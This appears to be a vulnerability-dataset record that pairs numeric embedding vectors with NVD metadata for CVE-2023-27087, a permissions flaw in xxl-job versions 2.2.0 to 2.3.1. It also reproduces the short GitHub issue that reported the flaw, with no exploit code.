0.009494282305240631, 0.028558557853102684, 0.00032390528940595686, 0.023500997573137283, -0.0030417286325246096, -0.00328211416490376, 0.003838597098365426, 0.013211740180850029, -0.0004578208609018475, 0.0016476819291710854, -0.022335033863782883, 0.0031685461290180683, 0.007783191278576851, 0.019912250339984894, 0.011894351802766323, 0.009774415753781796, -0.0044480785727500916, -0.011720214039087296, -0.007283492013812065, 0.001830336987040937, 0.009751702658832073, 0.008328317664563656, 0.0010798420989885926, -0.0027067032642662525, 0.01712604984641075, 0.0037609923165291548, -0.018640289083123207, 0.020215097814798355, 0.013613013550639153, 0.002021509688347578, -0.004731998313218355, -0.0016524138627573848, 0.016247790306806564, 0.024500396102666855, 0.012106345035135746, 0.036493171006441116, 0.017428897321224213, -0.032435011118650436, 0.018186016008257866, 0.003738278755918145, 0.006091028451919556, 0.006003959570080042, -0.021926188841462135, 0.006106170825660229, -0.003003872698172927, -0.029633667320013046, 0.010221117176115513, -0.0002697239106055349, -0.039763931185007095, 0.013385877013206482, 0.008237463422119617, 0.010198403149843216, -0.016474926844239235, 0.008282890543341637, -0.013961288146674633, -0.009244432672858238, -0.009130864404141903, -0.03479722514748573, 0.006367377005517483, -0.003361611859872937, 0.010773814283311367, -0.0015435778768733144, -0.005076488014310598, 0.031738460063934326, 0.006904932204633951, 0.0031306901946663857, -0.025499792769551277, 0.008222321048378944, -0.012045775540173054, 0.0038329188246279955, 0.007336490321904421, -0.014710837043821812, 0.017171476036310196, 0.016308359801769257, -0.008335888385772705, 0.008858301676809788, 0.023470712825655937, -0.010584534145891666, 0.01712604984641075, -0.014150568284094334, 0.002670740010216832, 0.003208294976502657, -0.012303195893764496, 0.015717806294560432, -0.0020196170080453157, -0.000681880977936089, -0.007457629777491093, -0.009638134390115738, 0.017565177753567696, -0.00334079097956419, -0.0067194378934800625, 0.008161750622093678, -0.008669021539390087, -0.011621788144111633, 0.024727530777454376, -0.009721417911350727, 0.016959482803940773, -0.0008910353062674403, 0.0034808581694960594, -0.01714119128882885, 0.00374963553622365, 0.012144201435148716, -0.03652345761656761, -0.004970491398125887, 0.012204770930111408, -0.00018407474271953106, -0.005311195272952318, -0.005148414522409439, 0.011788355186581612, 0.02244102954864502, -0.01499097142368555, 0.014120283536612988, 0.014158139936625957, -0.011477936059236526, -0.03788627311587334, -0.005307409446686506, -0.006511230021715164, 0.004724427126348019, -0.023425284773111343, -0.006628583651036024, -0.008669021539390087, 0.0028656984213739634, 0.009895555675029755, -0.004406436812132597, 0.010387683287262917, -0.00665886839851737, 0.023652421310544014, 0.018292013555765152, 0.002538244007155299, 0.01293160580098629, -0.004966705571860075, 0.0043988656252622604, -0.014642695896327496, -0.015218107029795647, 0.011515791527926922, 0.0025590648874640465, -0.003104191040620208, -0.004069518763571978, 0.019836537539958954, -0.0198668222874403, 0.01390071865171194, -0.00786647479981184, 0.007162353023886681, -0.019291412085294724, 0.012356194667518139, -0.014211137779057026, 0.023334430530667305, 0.022410744801163673, 0.007150996010750532, -0.00023447052808478475, 0.017232045531272888, -0.002988730324432254, -0.008638736791908741, -0.016550637781620026, 0.020745081827044487, -0.025302942842245102, 0.015202964656054974, -0.008540310896933079, -0.03294985368847847, -0.0028808407951146364, -0.016641492024064064, 0.0063408780843019485, -0.0033786469139158726, 0.002303536981344223, -0.009516995400190353, -0.006215953268110752, -0.006791364401578903, 0.013355592265725136, 0.011894351802766323, 0.026393195614218712, 0.007060141768306494, -0.01682320050895214, -0.001976082567125559, 0.01078895665705204, 0.01356001477688551, -0.02048766054213047, 0.006836791522800922, 0.014937972649931908, 0.00023754632275085896, 0.007510628085583448, 0.000785038573667407, -0.018367726355791092, 0.0021937545388936996, -0.0028051286935806274, -0.013461589813232422, -0.038613107055425644, 0.000461843068478629, 0.016732346266508102, 0.008229891769587994, -0.0007817261503078043, 0.00137795798946172, 0.016338644549250603, -0.00443672202527523, 0.020851077511906624, 0.006310593336820602, -0.006378734018653631, -0.02719574235379696, -0.0027521303854882717, -0.0063408780843019485, 0.015096968039870262, -0.010198403149843216, -0.000056222059356514364, -0.016020653769373894, 0.005810894072055817, 0.012325909920036793, 0.0011924636783078313, 0.022925587370991707, -0.008358602412045002, 0.00911572203040123, -0.02204732783138752, 0.021593056619167328, -0.010766242630779743, 0.012734754011034966, 0.02275902032852173, 0.014150568284094334, -0.010342256166040897, -0.00786647479981184, 0.0022902872879058123, 0.013605441898107529, -0.004769854713231325, 0.023258719593286514, -0.0020139385014772415, -0.00401273462921381, -0.010410396382212639, -0.008237463422119617, -0.010925238020718098, 0.02283473126590252, 0.01359787117689848, -0.0005484386347234249, -0.018398011103272438, 0.01588437333703041, 0.0004228040634188801, 0.008487312123179436, -0.020078815519809723, -0.04058162122964859, 0.021002503111958504, -0.006450660526752472, 0.0032196517568081617, 0.0008370905416086316, 0.006810292135924101, -0.00007334597466979176, -0.005988817196339369, -0.0021180424373596907, 0.014930401928722858, 0.008759875781834126, -0.012628757394850254, 0.02648404985666275, 0.018413152545690536, 0.030027369037270546, -0.005129486322402954, -0.017020052298903465, 0.0031571893487125635, 0.000651596172247082, 0.011576361022889614, 0.005515617318451405, -0.004111160524189472, -0.009040010161697865, 0.014029429294168949, 0.018125446513295174, -0.014809262938797474, 0.005061345640569925, 0.003471394069492817, -0.005886605940759182, 0.02383412979543209, 0.0003466188791207969, 0.0030133365653455257, 0.015626952052116394, 0.0018284441903233528, 0.017004908993840218, -0.0021331850439310074, 0.0024738889187574387, -0.005167342256754637, 0.015006113797426224, 0.007226708345115185, 0.008669021539390087, -0.004228513687849045, 0.02562093362212181, 0.01565723679959774, 0.007684765383601189, -0.009244432672858238, 0.014430702663958073, -0.018261728808283806, -0.021441631019115448, 0.00911572203040123, -0.00156818435061723, 0.0017413754248991609, 0.03334355354309082, -0.012590901926159859, 0.012537903152406216, 0.016550637781620026, 0.0038613108918070793, 0.013666011393070221, 0.005720039829611778, 0.0045805745758116245, -0.02725631184875965, -0.004951563198119402, 0.00342785962857306, 0.01761060580611229, -0.008320746012032032, -0.008207178674638271, -0.019457977265119553, -0.01698976755142212, -0.0003108922974206507, 0.030163651332259178, 0.008237463422119617, -0.01192463655024767, -0.01714119128882885, 0.010342256166040897, 0.013976430520415306, -0.0381588377058506, 0.015498241409659386, -0.011561218649148941, 0.01644464209675789, 0.005243054591119289, -0.002354642376303673, 0.01417328231036663, 0.023516139015555382, -0.0035792835988104343, -0.0020858650095760822, 0.038613107055425644, 0.030436214059591293, 0.00012386006710585207, -0.006030458956956863, -0.00510298740118742, -0.026529476046562195, 0.014264136552810669, -0.005155985709279776, -0.0005839286022819579, -0.0005380282527767122, -0.008987011387944221, -0.018367726355791092, -0.028497988358139992, -0.002504173666238785, 0.009168720804154873, -0.006000174209475517, -0.012818037532269955, -0.018504006788134575, -0.01394614577293396, 0.00012001531285932288, -0.017656031996011734, -0.005205198191106319, -0.009282288141548634, 0.026771754026412964, -0.0299819428473711, -0.0014290635008364916, -0.004508648067712784, 0.004928849637508392, -0.001097823609597981, -0.018973421305418015, 0.005000776145607233, -0.007010928820818663, -0.02774086780846119, 0.011917064897716045, 0.0031609749421477318, 0.012401621788740158, -0.011288655921816826, -0.015854088589549065, 0.013378306291997433, 0.0006047494243830442, 0.0006397662218660116, 0.0067005096934735775, 0.013385877013206482, -0.008828015998005867, 0.008419171907007694, -0.0074122026562690735, -0.006643726024776697, 0.01729261502623558, 0.0015038291458040476, -0.01098580751568079, 0.003314291825518012, -0.0028221639804542065, 0.0014716514851897955, 0.021017644554376602, 0.004126302897930145, -0.011281084269285202, 0.020972218364477158, 0.0032896853517740965, 0.008600880391895771, 0.015414958819746971, 0.0097365602850914, 0.00950185302644968, 0.021623341366648674, -0.006087243091315031, 0.020533088594675064, -0.02478810027241707, -0.008222321048378944, 0.007567412219941616, 0.005152199883013964, 0.010508822277188301, -0.023243576288223267, 0.006761079654097557, -0.010448252782225609, 0.0035944259725511074, 0.0022353960666805506, 0.00029172771610319614, -0.023576710373163223, -0.018367726355791092, 0.010486109182238579, -0.005564830265939236, 0.01094038039445877, -0.003971093334257603, 0.023864414542913437, -0.017777172848582268, 0.008616022765636444, -0.009721417911350727, 0.02133563533425331, 0.018216300755739212, -0.014816833660006523, 0.008956726640462875, -0.01250004768371582, 0.00436479551717639, 0.020457375794649124, -0.01102366391569376, -0.008055754005908966, 0.0120760602876544, 0.008722019381821156, 0.0005030114552937448, -0.013507016934454441, -0.014672980643808842, 0.0009142220951616764, -0.037583425641059875, 0.002155898604542017, -0.020533088594675064, -0.003738278755918145, 0.011803497560322285, 0.011182659305632114, -0.004376152064651251, -0.0056518991477787495, -0.007684765383601189, -0.02321329154074192, 0.00825260579586029, -0.020533088594675064, -0.008555453270673752, -0.011848924681544304, 0.013802293688058853, 0.017095765098929405, 0.00156818435061723, 0.05414920672774315, 0.011250799521803856, 0.0020461161620914936, 0.005481547210365534, -0.0015795411309227347, 0.007362989708781242, 0.0021615768782794476, -0.012151772156357765, -0.012492476031184196, -0.01351458765566349, -0.0202453825622797, 0.003666352480649948, 0.0010770028457045555, -0.02009395882487297, -0.0016173970652744174, 0.013378306291997433, 0.010455823503434658, -0.0016069867415353656, -0.024242974817752838, -0.0019685113802552223, -0.02780143730342388, -0.00453893281519413, 0.010099977254867554, -0.005061345640569925, 0.0022372889798134565, -0.00011055131471948698, 0.000768949743360281, 0.00594339007511735, 0.0005593222449533641, 0.00035206068423576653, 0.020593658089637756, 0.011591503396630287, -0.010031837038695812, 0.006651297211647034, 0.017868027091026306, 0.019503405317664146, -0.013703867793083191, 0.022955872118473053, -0.004894779063761234, -0.008790160529315472, 0.01744403876364231, 0.010342256166040897, 0.0021047929767519236, -0.0014697586884722114, 0.00020868112915195525, -0.004573003388941288, -0.0014972042990848422, -0.01083438377827406, 0.0035376420710235834, 0.0011820532381534576, -0.01636892929673195, 0.016187220811843872, 0.00029882570379413664, -0.010137833654880524, 0.025212088599801064, -0.0028354134410619736, -0.006151597946882248, -0.008888586424291134, -0.00029338389867916703, -0.0005976514075882733, -0.0019571545999497175, -0.003193152602761984, -0.008767446503043175, 0.003738278755918145, -0.0128483222797513, 0.014892545528709888, 0.014831976033747196, 0.01791345328092575, -0.007465200964361429, -0.008275318890810013, 0.012204770930111408, -0.006594513077288866, 0.0022164680995047092, 0.0013079243944957852, -0.015157537534832954, -0.011856495402753353, 0.027710583060979843, -0.006280308589339256, -0.010486109182238579, 0.022032184526324272, -0.019124845042824745, -0.014203567057847977, 0.005326337646692991, 0.00625002384185791, 0.003355933353304863, -0.01644464209675789, -0.024651819840073586, -0.005742753390222788, 0.0022789305076003075, 0.029118826612830162, -0.007347847335040569, 0.005235483404248953, -0.028921974822878838, 0.00869173463433981, -0.0024511751253157854, 0.01374929491430521, 0.008714448660612106, 0.005791966337710619, 0.010039407759904861, 0.008419171907007694, -0.017398612573742867, 0.008570595644414425, -0.008775018155574799, -0.007480343338102102, -0.00034425288322381675, -0.01121294405311346, -0.02577235735952854, -0.014695694670081139, -0.0194882620126009, 0.017247188836336136, -0.024106692522764206, 0.015778375789523125, -0.017262330278754234, 0.01183378230780363, -0.002297858474776149, -0.009388284757733345, -0.001435688347555697, -0.00015793045167811215, 0.01312088593840599, 0.009706275537610054, -0.001976082567125559, -0.006647511385381222, 0.021244781091809273, -0.0005011186585761607, -0.001624968252144754, -0.023652421310544014, -0.0019571545999497175, 0.025757214054465294, 0.017595462501049042, 0.012643899768590927, -0.006011530756950378, -0.011765641160309315, 0.0011110733030363917, 0.0033010421320796013, 0.00806332565844059, 0.032132163643836975, -0.0015218107728287578, 0.00891887117177248, 0.01440798956900835, 0.0016448426758870482, -0.010470966808497906, 0.03800741210579872, -0.00044764706399291754, -0.006091028451919556, 0.004114945884793997, -0.0007646909798495471, -0.008275318890810013, -0.0029698023572564125, 0.0017820706125348806, -0.021017644554376602, -0.0021521130111068487, 0.010735957883298397, 0.032919567078351974, 0.0022940728813409805, -0.0011328404070809484, 0.016853485256433487, -0.006257595028728247, 0.009524567052721977, -0.020911647006869316, 0.010448252782225609, -0.011818639934062958, -0.00045995027176104486, -0.006162954960018396, 0.018322298303246498, -0.0017375898314639926, 0.01016811840236187, 0.007321347948163748, -0.0020782938227057457, 0.013923432677984238, 0.0019107810221612453, -0.02157791331410408, 0.000015911344235064462, -0.0039029524195939302, -0.0014972042990848422, 0.006208382081240416, 0.011387080885469913, 0.006723223719745874, -0.001949583413079381, 0.00892644189298153, 0.014627553522586823, 0.024757815524935722, -0.008033040910959244, -0.017095765098929405, -0.003679602174088359, 0.021623341366648674, -0.0007003357750363648, -0.022562168538570404, -0.007120711263269186, 0.027831722050905228, 0.003952165134251118, 0.011954921297729015, -0.033918965607881546, 0.011720214039087296, -0.004289083648473024, -0.005360407754778862, 0.011818639934062958, -0.003047407139092684, 0.0018663002410903573, 0.012129059061408043, -0.011114518158137798, -0.022259321063756943, -0.013734152540564537, 0.003429752541705966, 0.03204130753874779 ]
CVE-2023-27087
2023-03-21T19:15:11.607000
Permissions vulnerabiltiy found in Xuxueli xxl-job v2.2.0, v 2.3.0 and v.2.3.1 allows attacker to obtain sensitive information via the pageList parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xuxueli/xxl-job/issues/3096" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C7AE69F1-6781-47B8-933D-989F4EF5ED19", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "233AAF33-91ED-425F-951A-1DAAC0B3A4C5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "3F9E9173-1AD8-4DFA-8AC2-7C91E73635D3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/xuxueli/xxl-job/issues/3096
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xuxueli", "xxl-job" ]
Vertical overreach vulnerability exists in XXL-JOB The defect code is as follows v2.2.0、v2.3.0、v2.3.1 ![image](https://user-images.githubusercontent.com/110451039/220047413-f6e1720d-ea46-406b-82a0-85192041fd4d.png)
XXL-JOB Vertical Overreach vulnerability
https://api.github.com/repos/xuxueli/xxl-job/issues/3096/comments
0
2023-02-20T08:05:04
2023-02-20T08:05:04Z
https://github.com/xuxueli/xxl-job/issues/3096
1,591,349,265
3,096
true
This is a GitHub Issue repo:xxl-job owner:xuxueli Title : XXL-JOB Vertical Overreach vulnerability Issue date: --- start body --- Vertical overreach vulnerability exists in XXL-JOB The defect code is as follows v2.2.0、v2.3.0、v2.3.1 ![image](https://user-images.githubusercontent.com/110451039/220047413-f6e1720d-ea46-406b-82a0-85192041fd4d.png) --- end body ---
368
[ -0.011195708066225052, 0.016675464808940887, -0.007955881766974926, 0.00643241498619318, 0.057789381593465805, -0.01026666909456253, -0.00820388738065958, 0.0542621836066246, -0.01487249881029129, 0.0021985946223139763, 0.009558080695569515, -0.009408488869667053, 0.006719787139445543, 0.0015618485631421208, 0.0024328227154910564, 0.05416770279407501, 0.0012223162921145558, 0.020627817139029503, 0.03243763744831085, -0.02138364501297474, -0.008660534396767616, -0.010313908569514751, 0.017809206619858742, 0.08647936582565308, -0.030201643705368042, -0.007487425114959478, 0.01664397120475769, -0.00028195942286401987, -0.020155424252152443, 0.02253313548862934, 0.011990902945399284, 0.005523058585822582, 0.005160890985280275, -0.010022600181400776, 0.045853592455387115, 0.001388637931086123, 0.0319022573530674, 0.0377914197742939, -0.04308221861720085, -0.02596585638821125, -0.013132519088685513, -0.03788590058684349, -0.01982474885880947, -0.0014791798312216997, 0.0033598935697227716, 0.013195504434406757, 0.007392946630716324, -0.005263242870569229, -0.053884267807006836, 0.027351541444659233, 0.02350941300392151, -0.017163604497909546, -0.008951842784881592, -0.05086095258593559, -0.019210638478398323, -0.02280082367360592, 0.06544214487075806, 0.03023313730955124, -0.0010097395861521363, 0.019541313871741295, -0.012793970294296741, -0.009636812843382359, 0.013573418371379375, 0.0032969077583402395, -0.004830216057598591, 0.039492033421993256, -0.0030902361031621695, 0.02267485298216343, -0.014305627904832363, 0.038326799869537354, 0.003946447744965553, -0.010313908569514751, 0.026532726362347603, -0.0028835642151534557, 0.007365390658378601, 0.0082668736577034, 0.02458016946911812, -0.014179656282067299, -0.04166503995656967, 0.0036157730501145124, -0.04320819303393364, 0.00868415366858244, -0.05410471931099892, -0.015415750443935394, 0.03741350769996643, 0.0342642217874527, -0.042893264442682266, -0.07520493119955063, 0.002917025238275528, -0.01806114986538887, -0.02196626365184784, 0.011053990572690964, -0.009723417460918427, -0.021178942173719406, 0.023194484412670135, -0.023430680856108665, -0.004743610508739948, -0.01902168244123459, -0.05712803080677986, -0.015675567090511322, -0.011132722720503807, 0.021761560812592506, -0.021037224680185318, -0.01639202982187271, 0.007707875221967697, -0.009534460492432117, 0.0019515726016834378, -0.006940237246453762, 0.001082566799595952, 0.09662006795406342, 0.028516776859760284, 0.008432210423052311, -0.05416770279407501, -0.012518408708274364, -0.03243763744831085, 0.04985318332910538, -0.0265799667686224, -0.026737431064248085, -0.023934567347168922, -0.016958899796009064, 0.021178942173719406, -0.0150535823777318, -0.02209223434329033, -0.04569612815976143, -0.029351336881518364, 0.0182815995067358, 0.005625410471111536, 0.03848426416516304, -0.005168764386326075, 0.017541518434882164, -0.052813511341810226, -0.013628531247377396, 0.015234666876494884, -0.05215216055512428, 0.017982417717576027, 0.030185896903276443, 0.01352617982774973, 0.03728753700852394, -0.02502107061445713, 0.016691211611032486, -0.03130389377474785, -0.039145614951848984, -0.010951639153063297, 0.0057513820938766, -0.011384665966033936, 0.015250412747263908, -0.0018541415920481086, -0.0036000264808535576, -0.03081575408577919, 0.01516380812972784, -0.02042311429977417, -0.02138364501297474, 0.030059926211833954, 0.05630921572446823, 0.05064050480723381, -0.023052766919136047, -0.006885124370455742, 0.05218365415930748, -0.015470863319933414, -0.01528977882117033, 0.009132926352322102, -0.024139270186424255, 0.03719305619597435, 0.006562322843819857, -0.020738042891025543, -0.039240092039108276, 0.019982213154435158, 0.013738756068050861, -0.038547251373529434, 0.029430069029331207, 0.00410588039085269, -0.023934567347168922, 0.0029091520700603724, -0.0004925678949803114, -0.030500825494527817, -0.02736728824675083, 0.041728027164936066, -0.0007548442808911204, -0.014856752008199692, -0.03328794240951538, -0.025666672736406326, 0.021682828664779663, -0.0014624493196606636, 0.01771472953259945, 0.0009866119362413883, -0.00431452039629221, 0.011116975918412209, -0.03021739050745964, 0.004220041912049055, -0.05278201773762703, -0.01121145486831665, -0.01891145668923855, 0.025304505601525307, -0.04509776085615158, 0.001662231981754303, -0.030516572296619415, 0.008345605805516243, -0.006522956769913435, 0.044814325869083405, -0.029319845139980316, 0.02443845197558403, 0.004794786684215069, -0.029130887240171432, -0.010668203234672546, -0.023194484412670135, -0.0005216003628447652, -0.014982723630964756, 0.01009345892816782, 0.026973627507686615, -0.028359312564134598, -0.03338242322206497, 0.0013660023687407374, 0.00849519670009613, 0.01995072141289711, -0.0265484731644392, 0.016848675906658173, 0.02454867772758007, 0.028375059366226196, -0.03769694268703461, -0.028658494353294373, 0.028548268601298332, -0.01079417485743761, 0.015360638499259949, -0.030548065900802612, -0.03259510174393654, -0.027099598199129105, -0.01806114986538887, 0.0005772049189545214, -0.061474043875932693, 0.04827854037284851, 0.008010993711650372, -0.03593334183096886, 0.002861912827938795, -0.010888652876019478, 0.018565036356449127, 0.003153221681714058, -0.02502107061445713, 0.007621270138770342, -0.007648826111108065, -0.025414731353521347, 0.023698370903730392, -0.004657005425542593, -0.014061558060348034, -0.026595711708068848, 0.017100617289543152, 0.03974397853016853, 0.005314418580383062, -0.010361148044466972, 0.005645093508064747, -0.00013482876238413155, 0.011612989008426666, 0.015140187926590443, 0.015848776325583458, -0.002387551823630929, 0.010809920728206635, 0.009085687808692455, 0.01069182250648737, 0.03128814697265625, -0.030768515542149544, 0.011990902945399284, -0.008062169887125492, 0.022989781573414803, -0.05108140408992767, 0.025446223095059395, 0.009912374429404736, -0.025540702044963837, -0.013573418371379375, 0.019431088119745255, 0.02774520218372345, -0.03816933557391167, 0.019525567069649696, -0.011817692779004574, -0.02702086605131626, -0.03533497825264931, -0.014022191986441612, -0.004499541129916906, -0.0010599312372505665, 0.0124003104865551, 0.03621677681803703, -0.028296327218413353, 0.00868415366858244, 0.01665971800684929, 0.0050703492015600204, 0.04695584252476692, 0.04323968291282654, 0.005456136539578438, 0.03955502063035965, -0.016927408054471016, -0.02040736749768257, -0.017336813732981682, -0.03250062093138695, -0.001967319054529071, -0.02738303318619728, -0.0014762274222448468, 0.01256564725190401, 0.00862904079258442, 0.0038716522976756096, 0.029587533324956894, -0.012463295832276344, -0.00480659632012248, -0.015785790979862213, -0.002572572324424982, -0.03319346532225609, -0.02231268398463726, -0.006436351221054792, 0.003594121662899852, -0.007814163342118263, 0.040783241391181946, -0.006011197809129953, 0.016486506909132004, 0.05265604704618454, -0.019525567069649696, 0.0023934566415846348, -0.029933955520391464, -0.01900593563914299, 0.008125155232846737, 0.026501234620809555, 0.012431803159415722, -0.013715136796236038, -0.0013984794495627284, -0.010613090358674526, 0.0006751280161552131, -0.06764664500951767, 0.0033480837009847164, 0.03439019247889519, -0.0018354427302256227, -0.03911412134766579, 0.018706753849983215, -0.03753947839140892, -0.0035193259827792645, 0.015171680599451065, -0.03404377028346062, -0.01186493132263422, -0.05737997591495514, 0.011801945976912975, -0.03520900756120682, -0.022501641884446144, -0.010306035168468952, 0.01037689484655857, -0.011227201670408249, -0.001591373118571937, 0.014140290208160877, 0.007054398767650127, 0.0060033248737454414, 0.014541824348270893, -0.03231166675686836, 0.010636710561811924, -0.004483794793486595, 0.047774653881788254, 0.02621779777109623, 0.0009605319355614483, 0.009069941006600857, 0.026280784979462624, 0.03974397853016853, -0.008062169887125492, 0.005952148698270321, -0.010857160203158855, 0.006743406876921654, 0.02456442452967167, 0.01440010592341423, -0.002478093607351184, -0.03763395547866821, -0.012431803159415722, 0.0271310918033123, 0.0057316990569233894, -0.007991311140358448, 0.00230094650760293, -0.026485487818717957, -0.0389566570520401, -0.011179962195456028, -0.04802659898996353, 0.05045154690742493, 0.029351336881518364, 0.01875399239361286, -0.02078528143465519, -0.00844795722514391, 0.015864523127675056, 0.018958697095513344, -0.02220246009528637, 0.033004507422447205, -0.058482225984334946, -0.0091486731544137, 0.011148469522595406, -0.004692434798926115, -0.010306035168468952, 0.02280082367360592, -0.006058437284082174, 0.007857466116547585, 0.020848266780376434, 0.003029218642041087, -0.02596585638821125, 0.042074449360370636, -0.00850307010114193, -0.03927158564329147, 0.010581597685813904, 0.010731188580393791, -0.01121145486831665, -0.0065347664058208466, 0.006991412956267595, -0.031193668022751808, 0.020060945302248, 0.0038224447052925825, 0.04072025790810585, 0.01818712055683136, 0.03046933375298977, -0.0007218751707114279, 0.04437342658638954, 0.008243253454566002, 0.016628224402666092, -0.005479756277054548, 0.021887531504034996, 0.008345605805516243, -0.03130389377474785, -0.02114744856953621, 0.053663816303014755, 0.0073142144829034805, 0.029682012274861336, -0.0013010484399273992, -0.03470512107014656, 0.02538323774933815, 0.013345095328986645, -0.016376283019781113, 0.005479756277054548, -0.011337426491081715, -0.004759357310831547, 0.016675464808940887, -0.02173006720840931, 0.014848879538476467, 0.014211148954927921, -0.02549346350133419, -0.010447753593325615, 0.0065465765073895454, 0.010597344487905502, 0.0004404078354127705, 0.0027418462559580803, -0.009495094418525696, 0.02347792126238346, -0.023399189114570618, 0.010683950036764145, -0.009266771376132965, -0.03722454980015755, 0.0507979691028595, 0.020974239334464073, -0.03479960188269615, -0.037854406982660294, -0.016832929104566574, -0.0354609489440918, 0.0039051135536283255, 0.01215624064207077, -0.013234870508313179, -0.016706956550478935, -0.015077202580869198, -0.051049910485744476, -0.035366471856832504, -0.021556856110692024, -0.008951842784881592, -0.014030065387487411, -0.018391825258731842, 0.015596834011375904, -0.0030567748472094536, -0.029556039720773697, 0.04774316027760506, -0.024123523384332657, -0.016360536217689514, 0.006373365875333548, 0.02917812578380108, 0.01121145486831665, 0.018139882013201714, 0.021210435777902603, -0.03331943601369858, 0.0025804454926401377, 0.001526419073343277, -0.0015815316000953317, 0.006101740058511496, -0.004775103647261858, 0.04405849799513817, -0.00041580403922125697, -0.03136688098311424, -0.006396985147148371, 0.020013706758618355, -0.017683235928416252, -0.041979968547821045, -0.021100210025906563, 0.013156138360500336, 0.016486506909132004, -0.02324172481894493, 0.011857057921588421, -0.023351948708295822, -0.003916923422366381, 0.018124135211110115, 0.06663887202739716, 0.006137169431895018, -0.02313149906694889, -0.008046423085033894, 0.000660365738440305, -0.05045154690742493, -0.023761356249451637, 0.001321715535596013, 0.019809003919363022, -0.009132926352322102, 0.034201234579086304, 0.0200766921043396, 0.002070654882118106, 0.012431803159415722, 0.03593334183096886, -0.03703559190034866, -0.03259510174393654, 0.02207648940384388, -0.005759255029261112, -0.04459387809038162, 0.008573928847908974, -0.022517388686537743, -0.007219735998660326, -0.0472077839076519, -0.01144765131175518, -0.04119265079498291, 0.02445419877767563, 0.016124339774250984, 0.012463295832276344, 0.010164317674934864, -0.03046933375298977, -0.054608602076768875, 0.022454403340816498, 0.0032555735670030117, 0.027430273592472076, 0.0006677468772977591, -0.010605217888951302, 0.010542231611907482, -0.011983029544353485, -0.024879353120923042, -0.027760948985815048, 0.00758190406486392, -0.021289167925715446, 0.06056075170636177, -0.02856401540338993, 0.02950880117714405, -0.005601790733635426, 0.003977940883487463, -0.020123932510614395, 0.008007057011127472, -0.007900768890976906, 0.04298774152994156, -0.04557015374302864, -0.01210112776607275, -0.0023659004364162683, 0.009038448333740234, -0.008038550615310669, 0.009022701531648636, 0.005893099587410688, -0.0013167947763577104, -0.00003586002276279032, -0.021304912865161896, 0.006322189699858427, 0.0033461153507232666, 0.0005644109332934022, -0.023997552692890167, -0.0024702204391360283, 0.005424643401056528, 0.012919941917061806, 0.02135215327143669, -0.01303804013878107, 0.005586044397205114, 0.007144940551370382, -0.01760450378060341, 0.004531033802777529, 0.009132926352322102, -0.01713211089372635, 0.04106667637825012, -0.0507979691028595, -0.005546678323298693, 0.010849286802113056, -0.004653068725019693, -0.0066371182911098, 0.00868415366858244, 0.006180472206324339, 0.024139270186424255, -0.008219634182751179, 0.008345605805516243, 0.0043342034332454205, -0.014707161113619804, -0.01304591353982687, 0.016124339774250984, -0.029571786522865295, 0.02527301199734211, 0.006739470176398754, -0.013297855854034424, 0.010006853379309177, 0.0011239011073485017, -0.010290289297699928, -0.011597242206335068, -0.01571493223309517, 0.023210231214761734, 0.007951945066452026, -0.0001342136674793437, 0.012620760127902031, 0.002068686531856656, 0.01569131389260292, 0.012219225987792015, 0.010258796624839306, -0.00984938908368349, 0.027540497481822968, 0.024595916271209717, 0.017557265236973763, -0.02681616321206093, -0.024627409875392914, 0.027540497481822968, 0.01958855241537094, 0.009817896410822868, -0.015171680599451065, 0.021178942173719406, -0.00661349855363369, 0.03709857910871506, 0.06194643676280975, -0.013258489780128002, 0.01818712055683136, 0.0021592285484075546, 0.008148775435984135, 0.00896758958697319, -0.014896118082106113, 0.0017212810926139355, -0.0023580272682011127, -0.03810634836554527, 0.03196524456143379, -0.03939755633473396, 0.011801945976912975, 0.02620205283164978, -0.010754808783531189, -0.002800895366817713, 0.003050870029255748, -0.010613090358674526, -0.036657679826021194, 0.005286862142384052, -0.01115634199231863, -0.0649382621049881, 0.008479449898004532, 0.01713211089372635, 0.027320047840476036, 0.0008754028240218759, -0.01380174234509468, -0.01949407532811165, -0.022974034771323204, 0.011935790069401264, -0.005637220107018948, -0.0008704820647835732, -0.029918208718299866, -0.0082590002566576, -0.007341770920902491, 0.013069532811641693, 0.014746527187526226, 0.015966875478625298, -0.006554449442774057, 0.043491628021001816, 0.008873110637068748, 0.003840159624814987, 0.03612229973077774, -0.005345911253243685, 0.01540000457316637, 0.038326799869537354, -0.03448467329144478, 0.0018994126003235579, -0.02360389195382595, -0.04084622859954834, -0.017053378745913506, -0.01116421539336443, 0.022989781573414803, -0.01689591445028782, -0.012250718660652637, -0.021052971482276917, 0.024060538038611412, 0.019320864230394363, 0.03413825109601021, -0.028532523661851883, 0.013014420866966248, 0.021320659667253494, -0.017336813732981682, 0.00036659647594206035, 0.02042311429977417, 0.003952352795749903, -0.002218277659267187, 0.013841108419001102, 0.005900972988456488, -0.02195051684975624, 0.025225773453712463, -0.010597344487905502, -0.031020458787679672, -0.004861708730459213, -0.00505066616460681, -0.018691007047891617, -0.004204295575618744, 0.013093153014779091, -0.011833438649773598, 0.009164419956505299, 0.004098007455468178, -0.0013522242661565542, 0.009479348547756672, 